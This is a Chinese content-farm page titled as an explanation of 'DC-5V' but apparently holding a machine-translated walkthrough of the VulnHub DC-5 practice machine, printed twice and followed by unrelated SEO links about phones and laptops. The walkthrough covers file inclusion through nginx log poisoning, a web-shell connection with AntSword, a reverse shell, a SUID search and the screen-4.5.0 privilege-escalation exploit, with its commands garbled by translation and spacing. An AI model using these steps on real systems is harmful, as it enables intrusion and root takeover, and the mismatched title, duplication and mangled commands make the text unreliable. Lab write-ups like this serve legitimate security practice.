dc-5v(dc5v是什么意思)
本文主要介紹dc-5v(dc5v是什么意思),下面一起看看dc-5v(dc5v是什么意思)相關資訊。
準備工作在vulnhub官網下載dc:5無人機dc-5。
信息收集nmap -a -t4 -sv -p-192.168.1.14可以看出開放端口較少。經過查詢,111端口發現沒有任何東西可以訪問80端口。
觀察頁面,發現聯系人頁面可以提交東西。
但是刷新幾次后,你會發現后面的時間會發生變化,說明頁面是動態的,可能包含文件。
測試沒有問題。這里有兩點需要說明:文件和foot測試可以一個一個做。footer.php在這里被認為是一個暗示。其實還是需要一個強大的目錄字典和目錄掃描工具(burpsuit也可以)來猜測。
該文件包含一個試圖包含nginx的日志文件。默認的日志路徑是/var/log/var/log/nginx/access . log
成功!/hackyou然后用螞蟻劍連接 192 . 168 . 1 . 14/thank you . php?file=/var/log/nginx/access.log打開虛擬終端,彈回外殼。這個外殼不穩定。
然后用python彈殼。
python-c 導入ptypty.spawn。;/bin/bash ;) 權限提升檢查是否有無密碼root權限,進入命令行。
find/-perm -u=s -type f 2/dev/null發現screen-4.5.0可疑。嘗試使用searchsploit搜索漏洞。
searchsploit -p 41154.sh查看位置cp/usr/share/exploited b/exploited b/linux/local/41154 . sh/tmp復制到/tmp目錄分別編譯兩個短代碼。
gcc-fpic-shared-ldl-otmp/lib hax . sotmp/lib hax . cgcc-otmp/rootshelltmp/rootshellc,然后用ant sword把文件上傳到目標機/tmp目錄下,安裝在sh腳本上執行獲取shell獲取標志。
參考文1_ry-dc-5靶機對紅小豆餅的侵徹記錄_dc-5。
標簽:
目標文件
了解更多dc-5v(dc5v是什么意思)相關內容請關注本站點。
筆記本按鍵介紹圖,筆記本電腦鍵盤
華為手機拍照技巧集錦(華為手機拍照有哪些技巧)
小米手機關閉廣告的方法(小米手機怎么能關閉廣告)
mate20參數配置(華為mate20各個機型參數配置對比)
筆記本電腦無法開機怎么回事兒
dc-5v(dc5v是什么意思)
fodhelper.exe是什么程序老是自動彈出(fodhelper老彈出)
酷派5950怎么連接電腦,酷派5950怎么連接電腦
蘋果電腦安裝雙系統怎么樣(蘋果電腦安裝雙系統后還可以改回去嗎)
win7里沒有運行(win7怎么沒有運行程序)
安卓手機沒有文件管理怎么辦
筆記本m2接口圖片大全,懂m2固態的來現在的m2固態有幾種接口一樣的嗎
個人用筆記本電腦什么牌子好,筆記本電腦那個品牌好
云服務器怎么裝安卓模擬器(云服務器掛游戲教程)
三星502怎么降到444,三星p520靜音模式怎么退出啊
小愛同學電腦開關機(小愛同學如何開關電腦)
八千左右的電腦主機(八千左右的主機配置)
手提電腦如何鎖鍵盤(手提電腦怎么把鍵盤鎖掉)
win10 hdmi接口沒反應(win10顯示hdmi)
win7升級win10要錢嗎(win7升級到10要錢嗎)
準備工作在vulnhub官網下載dc:5無人機dc-5。
信息收集nmap -a -t4 -sv -p-192.168.1.14可以看出開放端口較少。經過查詢,111端口發現沒有任何東西可以訪問80端口。
觀察頁面,發現聯系人頁面可以提交東西。
但是刷新幾次后,你會發現后面的時間會發生變化,說明頁面是動態的,可能包含文件。
測試沒有問題。這里有兩點需要說明:文件和foot測試可以一個一個做。footer.php在這里被認為是一個暗示。其實還是需要一個強大的目錄字典和目錄掃描工具(burpsuit也可以)來猜測。
該文件包含一個試圖包含nginx的日志文件。默認的日志路徑是/var/log/var/log/nginx/access . log
成功!/hackyou然后用螞蟻劍連接 192 . 168 . 1 . 14/thank you . php?file=/var/log/nginx/access.log打開虛擬終端,彈回外殼。這個外殼不穩定。
然后用python彈殼。
python-c 導入ptypty.spawn。;/bin/bash ;) 權限提升檢查是否有無密碼root權限,進入命令行。
find/-perm -u=s -type f 2/dev/null發現screen-4.5.0可疑。嘗試使用searchsploit搜索漏洞。
searchsploit -p 41154.sh查看位置cp/usr/share/exploited b/exploited b/linux/local/41154 . sh/tmp復制到/tmp目錄分別編譯兩個短代碼。
gcc-fpic-shared-ldl-otmp/lib hax . sotmp/lib hax . cgcc-otmp/rootshelltmp/rootshellc,然后用ant sword把文件上傳到目標機/tmp目錄下,安裝在sh腳本上執行獲取shell獲取標志。
參考文1_ry-dc-5靶機對紅小豆餅的侵徹記錄_dc-5。
標簽:
目標文件
了解更多dc-5v(dc5v是什么意思)相關內容請關注本站點。
筆記本按鍵介紹圖,筆記本電腦鍵盤
華為手機拍照技巧集錦(華為手機拍照有哪些技巧)
小米手機關閉廣告的方法(小米手機怎么能關閉廣告)
mate20參數配置(華為mate20各個機型參數配置對比)
筆記本電腦無法開機怎么回事兒
dc-5v(dc5v是什么意思)
fodhelper.exe是什么程序老是自動彈出(fodhelper老彈出)
酷派5950怎么連接電腦,酷派5950怎么連接電腦
蘋果電腦安裝雙系統怎么樣(蘋果電腦安裝雙系統后還可以改回去嗎)
win7里沒有運行(win7怎么沒有運行程序)
安卓手機沒有文件管理怎么辦
筆記本m2接口圖片大全,懂m2固態的來現在的m2固態有幾種接口一樣的嗎
個人用筆記本電腦什么牌子好,筆記本電腦那個品牌好
云服務器怎么裝安卓模擬器(云服務器掛游戲教程)
三星502怎么降到444,三星p520靜音模式怎么退出啊
小愛同學電腦開關機(小愛同學如何開關電腦)
八千左右的電腦主機(八千左右的主機配置)
手提電腦如何鎖鍵盤(手提電腦怎么把鍵盤鎖掉)
win10 hdmi接口沒反應(win10顯示hdmi)
win7升級win10要錢嗎(win7升級到10要錢嗎)